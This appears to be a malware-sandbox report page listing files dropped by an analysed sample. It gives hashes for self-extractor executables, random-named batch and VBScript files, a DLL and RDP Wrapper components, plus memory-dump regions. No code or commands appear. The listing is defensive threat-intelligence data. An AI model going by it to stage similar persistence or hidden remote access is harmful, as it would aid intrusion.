eab7bd839c5f1d229cd1b1fa473572df345584483209a7b10f7aaac827e7489eaafd3d5f165ec63172596e7994b7da216027c7bc8cfdccabde8cfe2114aff4fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\brutos

Filesize
394KB

MD5
020ca8399d5809c0d0324133e4b8b1b1

SHA1
0ac8b5e0244c45c75daac033da1028b9de551162

SHA256
a9aa4bfc661a27fd8df576f9f931ce7889e549ac04d3bbef6f7f9408aa14c5c6

SHA512
1023e9724fdb2aa00b5ee41c2b537d784cae90dbc761cfd0202e388ceb7272ab98be3bae324cada2ebe739692216f2967d65433486227c950419d0420802fe08

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dera

Filesize
564KB

MD5
7042c42ab11714412914232b8aca6487

SHA1
fbdbaba75d22e47214312c5357848f00fbd17ea2

SHA256
5fb9b33be8bfeefb598d25b9bfdb4c5c1fba0f99bd14d3c2963ab5de183c3a02

SHA512
fdcaf5242aa1e6b47ccf6b28c3039bc66de6a13c08217fc4e72ab286badd5a1837ac6870f22e700c98143118a4810a08d1d86be8f3f7031e69bc9b5dcb6b1c5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\deras

Filesize
410KB

MD5
76f84f6090c115e35b4e170f2fb47a9a

SHA1
85b23daf1b5a2ad43e54c03f4bd2eec701abd6e2

SHA256
8935bdab7e61ec529e2cac9ded1190433d2ec4784bbe2724fd3665d193ddafd4

SHA512
86fba86dc7ffbee71c9647289524b06d551492e45ce31bd3cf1b0ef12f8d4e3a7644dc06d3b1ec1583c2238316c4b73fe326d4f6b6042a543d1cd61575038e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\dos.com

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\err.exe

Filesize
42KB

MD5
38bb4505707fdc7e45266cdc81c0544a

SHA1
27474c9b0d555ab4f10ee1445a917d4e947a4538

SHA256
2520a93fe9530212b2a49e1b131bf7ac273cf6b90950cefa0e60b4c962868dc4

SHA512
e34ff3fe10593e70e44b131a9a8274994ffd07462e6764d5fcd18e1b6bec89a577783d8f1c3481b5c3a098f8c282c03b282506dd805fe06d7c79644898773159

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gogrF.exe

Filesize
1.8MB

MD5
17e2cb0d15de28e402662a9ee7af2b87

SHA1
1c10cdcd7c4359aa1b35ec4ce12fd42bedb1a1a9

SHA256
b0369d44fb6aa6601968f8cc2c5e948495673043334f89256a0ab784f29c5621

SHA512
9216342f4bddf0bb8b9a5c8b9523203a0f0c97f07e6327cd688cf55c4a38972b421f1f248f83bbdf256ded9f465a3e82afa537a7c785cc0812ce789651d58444

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sfera

Filesize
577KB

MD5
4276f85d94bfc0401a32dd4119d8269b

SHA1
28c8b34aa1e02814ea41abe73dc57fb33786a9d6

SHA256
c11a11e949b86148708d59fbbb5bb0bcdbb6c07b96cd90a028fac5a6a814698b

SHA512
7de9a9e003c3f6cb6e824a61963de7962634d8cda54015ffe1c0d46c79e2546e6286a75460d64f540905e1019bd538909e670877e030d2269619fe7edc5dfd0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\sferas

Filesize
420KB

MD5
cfe03a0d90005edbb9302a43fe66efae

SHA1
0dbc9b31d86eb4f66e96c1d68e72e2553a5a8ffc

SHA256
bd42c6ee6346e9d78e9d804f739cf04db9284a9b79180b7940bdc60deb1ae5a4

SHA512
1788559a23b8b109c0291e7198cd52e2ff13eeaafb0ffe8a8a241ec93f9286faa62fdd1ee237c398084d1629f1bf635055a4648702f39fd6606596156979ec6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l11qzftu.cs5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\BHjbFmnD.bat

Filesize
1KB

MD5
6c7ce2212aa5d08f484954be75601c0c

SHA1
0b927c39579192dadfcaa66e53e5b0008a8e38b2

SHA256
95c1c21cf1f7d1fe35a56777791d0ed091d8b7be3b2caa2e9b502c0955bdf299

SHA512
9bd8e63e59328f8867ba62f591a7bca28cc2899dd9f25c3d8ff558b1b8a89f1bfa2291bb48504d068c55dd4b48bb67282f7a6575014ffe14ea224d98a0be1b9f

Download Submit
C:\Users\Admin\AppData\Roaming\CoJ.dll

Filesize
927B

MD5
6daabcaf5f0c1e345c831fbb5f8eaa8b

SHA1
35972642851f00ed560325fa09bb34fe6c51c068

SHA256
02b0d83dae952dd5334374989d6557f31f4c9834a9bc4e2772138d83b9b82604

SHA512
b38bbb1ce5892146950bb3b403f766d5cb8c3f3100cb8e9b69e1ccdbb1b99f50239055fa029fa23f4447c11dbef019919f91fc2d6bdaf982b3e806cf399c01e8

Download Submit
C:\Users\Admin\AppData\Roaming\CoJ.dll

Filesize
923B

MD5
45c3d4156a3624f1b7a402a451c8b66a

SHA1
2d9659391f43ba14fd415ed0d29151ac69d0cee5

SHA256
f18c25ebbd9f0f0f3b2b792df581702a3bf58cca596559db875ff2b3c6ededc9

SHA512
b94e2a9e635cab64dcbc18f0d65326aa1d1ade5c08d4532f7645f5cf2ad4dd922d7cae96649f425a99436bf5dc0372cabc0bc81a09add6ac0c5b1290f22405e8

Download Submit
C:\Users\Admin\AppData\Roaming\UyhbT.vbs

Filesize
4KB

MD5
0ce9c2c01d781e4a0fcf2be7c18df9b5

SHA1
37a8fe63332b0d96be6855692048f4509f7fdc48

SHA256
c01364b56cb8008a431239a9a70a041c81b177fa4f0b257fb4a8573110daaf4c

SHA512
4cd537ac76ff4c93f84354b21f3dbc2b7e7deea8e695a28363bcf28a2aead439fbabd5ea6a268b115aa7f7ed1c0c17219383af8aaab3dcc39fa4e8d9f075c413

Download Submit
C:\Users\Admin\AppData\Roaming\kbSG.vbs

Filesize
2KB

MD5
193242114c1738d0ea04aa93659fdd5a

SHA1
a929cc1cfbe44ba8a99117dfd7819776ab45d465

SHA256
c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928

SHA512
46825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4

Download Submit
C:\Users\Admin\AppData\Roaming\oWIu.vbs

Filesize
2KB

MD5
e2412243518e6670139e6a1ab6f86a11

SHA1
b5b55e61279bfea17414d17af75dd6800ffb97c6

SHA256
ddf634c6f7197af3255caf94af3c986ed7348e7efd508274075cb36254fc8762

SHA512
3d0289054ea2355d923da7f6cda0f52015808d73c73910a7145efff80636788dc99c12382ed5f6d25dc299a5be0222deed46a8018c83c6c2852072e4af6e62c6

Download Submit
C:\Users\Admin\AppData\Roaming\qGmbXLLUsL.bat

Filesize
1KB

MD5
fd5bdb9de205580a5b1cbbee5a115c93

SHA1
aca041af337daea9a28292a0bc47ddf65de924a0

SHA256
0ba027251fdc179b19f9dafb9514da691256f22468764d33c6c275e3e2f8580f

SHA512
0ea8e2d6d7e1a5ff567070ae1173197bbd8ee6fd131e5d5492b9763769995843833fc08c433de5c0018bae626fd4e082e2640610c5c1d8e00163bc5f5bcc711d

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
e6d6f56ec3018a47fc89f7cfb13a306f

SHA1
376e27352ef11564cebfc421a560902a66b09137

SHA256
2029cdbd529a922ce06753d2ae6d4a944f7d0eb4f7d84a8822eef8f855ee6649

SHA512
dbbe3575cbd0076b29b38f236a10baf3a89f5d7e531ca9f75a9150fd64aa9b10984ab415b539f7fdd2c3a5a893485867928a87f778bc46624e4e6f38404474c4

Download Submit
C:\Windows\System32\null

Filesize
1KB

MD5
9bf6f418494a277bf4d8a227b18a6735

SHA1
c6e778754623386aa4282e199579993e48cb7de6

SHA256
22961a3f1dfb2b13b6bad3ee034660b0bf5a73f847a2220a042f2a05d10ccd03

SHA512
72d47107c57866992497b304dc2b9ab6b9bcf4cff870b3a75ddfd720f7d5fc14a1121313d78803ca30f0407293f7eeea7c597e293fd746d088e69e7bb8e88804

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
188KB

MD5
234237e237aecf593574caf95b1432a2

SHA1
9b925bd5b9d403e90924f613d1d16ecf12066b69

SHA256
d9bb5a5359b3ff1865722b6fbf089f0165c5ce95d1ed9aea624ba57866781ceb

SHA512
b0cc341b68692899887a5750d937a8693f1063187f6341b7ac23512216f38381853309fd01440bd869d8816d5fded56486578f0e1169124ffe06ac92ad6723a0

Download Submit
memory/832-67-0x0000000001000000-0x0000000001067000-memory.dmp

Filesize
412KB

Download
memory/832-46-0x0000000001000000-0x0000000001067000-memory.dmp

Filesize
412KB

Download
memory/832-49-0x0000000001000000-0x0000000001067000-memory.dmp

Filesize
412KB

Download
memory/832-48-0x0000000001000000-0x0000000001067000-memory.dmp

Filesize
412KB

Download
memory/1756-120-0x0000000006D20000-0x0000000006D52000-memory.dmp

Filesize
200KB

Download
memory/1756-131-0x0000000007910000-0x000000000792E000-memory.dmp

Filesize
120KB

Download
memory/1756-134-0x0000000007A90000-0x0000000007AAA000-memory.dmp

Filesize
104KB

Download
memory/1756-135-0x0000000007AE0000-0x0000000007AEA000-memory.dmp

Filesize
40KB

Download
memory/1756-136-0x0000000007CF0000-0x0000000007D86000-memory.dmp

Filesize
600KB

Download
memory/1756-137-0x0000000007C90000-0x0000000007CA1000-memory.dmp

Filesize
68KB

Download
memory/1756-138-0x0000000007CB0000-0x0000000007CBE000-memory.dmp

Filesize
56KB

Download
memory/1756-139-0x0000000007CC0000-0x0000000007CD4000-memory.dmp

Filesize
80KB

Download
memory/1756-140-0x0000000007DB0000-0x0000000007DCA000-memory.dmp

Filesize
104KB

Download
memory/1756-141-0x0000000007D90000-0x0000000007D98000-memory.dmp

Filesize
32KB

Download
memory/1756-132-0x0000000007940000-0x00000000079E3000-memory.dmp

Filesize
652KB

Download
memory/1756-105-0x00000000058A0000-0x00000000058C2000-memory.dmp

Filesize
136KB

Download
memory/1756-103-0x0000000003260000-0x0000000003296000-memory.dmp

Filesize
216KB

Download
memory/1756-121-0x0000000075270000-0x00000000752BC000-memory.dmp

Filesize
304KB

Download
memory/1756-119-0x0000000006780000-0x00000000067CC000-memory.dmp

Filesize
304KB

Download
memory/1756-133-0x0000000008110000-0x000000000878A000-memory.dmp

Filesize
6.5MB

Download
memory/1756-107-0x0000000006220000-0x0000000006286000-memory.dmp

Filesize
408KB

Download
memory/1756-118-0x0000000006740000-0x000000000675E000-memory.dmp

Filesize
120KB

Download
memory/1756-117-0x0000000006290000-0x00000000065E4000-memory.dmp

Filesize
3.3MB

Download
memory/1756-104-0x0000000005910000-0x0000000005F38000-memory.dmp

Filesize
6.2MB

Download
memory/1756-106-0x0000000006140000-0x00000000061A6000-memory.dmp

Filesize
408KB

Download
memory/2040-172-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3068-170-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/3248-213-0x000001A1DB090000-0x000001A1DB0B2000-memory.dmp

Filesize
136KB

Download
memory/3648-64-0x0000000000400000-0x0000000000642000-memory.dmp

Filesize
2.3MB

Download
memory/3648-61-0x0000000000400000-0x0000000000642000-memory.dmp

Filesize
2.3MB

Download
memory/3716-189-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4432-59-0x00000000008A0000-0x00000000008C0000-memory.dmp

Filesize
128KB

Download
memory/4432-51-0x00000000008A0000-0x00000000008C0000-memory.dmp

Filesize
128KB

Download
memory/4524-182-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/4976-90-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4980-158-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download